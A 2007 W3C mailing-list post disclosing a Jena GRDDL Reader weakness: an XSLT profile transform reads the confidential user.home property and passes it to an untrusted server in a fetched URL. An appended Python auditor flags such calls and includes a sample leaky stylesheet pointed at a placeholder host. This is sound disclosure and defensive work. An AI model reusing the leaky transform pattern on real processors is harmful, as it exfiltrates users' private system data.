
Some more tests

From: Jeremy Carroll <jjc@hpl.hp.com>
Date: Tue, 06 Feb 2007 17:04:06 +0000
Message-ID: <45C8B506.8030603@hpl.hp.com>
To: public-grddl-comments@w3.org

FYI - using profileTransformation to expose slightly more subtle 
security issues.

I am still working on improving security features of the Jena GRDDL 
Reader. I thought that a test I've just added may be of general interest.

The goal of the test is to expose a weakness in version 0.1 of the Jena 
GRDDL Reader, so that I can fix it in 0.2.
Since I have already addressed blatant issues, this is slightly more subtle.

The test is security6 at
http://jena.sourceforge.net/test/grddl/

i.e.
http://jena.sourceforge.net/test/grddl/security6.html

This has a profile, which has a transform which uses system-property() 
(an XSLT 1.0 function). Using Saxon, which I do, this accesses, in 
addition to the three xsl: properties, also java properties (which is 
conformant behaviour). This transform accesses user.home, which is 
usually regarded as confidential information. This value is then set as 
the query parameter to the stylesheet URL which is referenced in the 
usual way as the value of an appropriate grddl:profileTransformation triple.
This URL is then got, using the GRDDL algorithm, which passes the 
confidential material (value of user.home) to the untrusted server.

In this particular case, the xsl script uses server side include to pass 
this value back as part of the GRDDL result.

In contrast, http://jena.sourceforge.net/test/grddl/permitted6.html 
accesses xsl:vendor-url (in my case http://www.saxonica.com/) which I 
don't think is regarded as confidential.

===

The issue this test raises is that the profileTransformation and 
schemaTransformation mechanisms provide a means for confidential data to 
be passed back to the server, even if less subtle means for the XSLT 
code to communicate to an outside server have been blocked (which they 
are in the Jena GRDDL Reader). Thus, the XSLT needs to run in an 
environment in which it has no access to confidential information.
(This is hence added to my to-do list)

Jeremy
Received on Tuesday, 6 February 2007 17:04:36 UTC
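The weakness described above (an XSLT transform reading a processor-defined system property such as user.home and splicing it into a URL the GRDDL reader will later fetch) can be caught before the transform is ever run. The following is an added example, not code from this message or from the Jena GRDDL Reader: a Python pre-flight audit that parses a stylesheet and reports every system-property() call whose argument is not one of the three xsl: properties XSLT 1.0 defines. The two stylesheets are constructed samples that follow the shapes of security6 and permitted6 as the message describes them; the URL in them is a placeholder.

```python
import re
import xml.etree.ElementTree as ET
from io import StringIO

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
# XSLT 1.0 mandates only these three; any other name is processor-defined
# (Saxon, for example, resolves it against Java system properties).
STANDARD_PROPS = {"version", "vendor", "vendor-url"}
CALL_RE = re.compile(r"""system-property\s*\(\s*(['"])([^'"]*)\1\s*\)""")

def audit_system_properties(xslt_text):
    """Return QNames passed to system-property() that lie outside the xsl:
    namespace, i.e. reads a GRDDL reader should refuse to evaluate."""
    prefixes = {}       # prefix -> namespace URI (document-wide approximation)
    attr_values = []    # every attribute value, including {AVT} expressions
    for event, payload in ET.iterparse(StringIO(xslt_text), events=("start-ns", "start")):
        if event == "start-ns":
            prefix, uri = payload
            prefixes[prefix] = uri
        else:
            attr_values.extend(payload.attrib.values())
    suspicious = []
    for value in attr_values:
        for _quote, qname in CALL_RE.findall(value):
            prefix, _, local = qname.rpartition(":")
            if prefix and prefixes.get(prefix) == XSL_NS and local in STANDARD_PROPS:
                continue  # xsl:vendor-url and friends reveal nothing about the host
            suspicious.append(qname)
    return suspicious

# Constructed samples (not the real security6/permitted6 files).
LEAKY_XSLT = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
    xmlns:grddl="http://www.w3.org/2003/g/data-view#">
  <xsl:template match="/">
    <rdf:RDF><rdf:Description rdf:about="">
      <grddl:profileTransformation
        rdf:resource="http://transform.example/t.xsl?h={system-property('user.home')}"/>
    </rdf:Description></rdf:RDF>
  </xsl:template>
</xsl:stylesheet>"""
PERMITTED_XSLT = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <vendor><xsl:value-of select="system-property('xsl:vendor-url')"/></vendor>
  </xsl:template>
</xsl:stylesheet>"""

if __name__ == "__main__":
    for name, text in (("leaky", LEAKY_XSLT), ("permitted", PERMITTED_XSLT)):
        print(name, audit_system_properties(text) or "clean")
```

Because the leaked value travels in a URL the reader itself requests, blocking outbound channels from the XSLT engine is not sufficient on its own; refusing non-xsl: property reads (or running the transform with no confidential properties visible) closes the path the audit flags.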
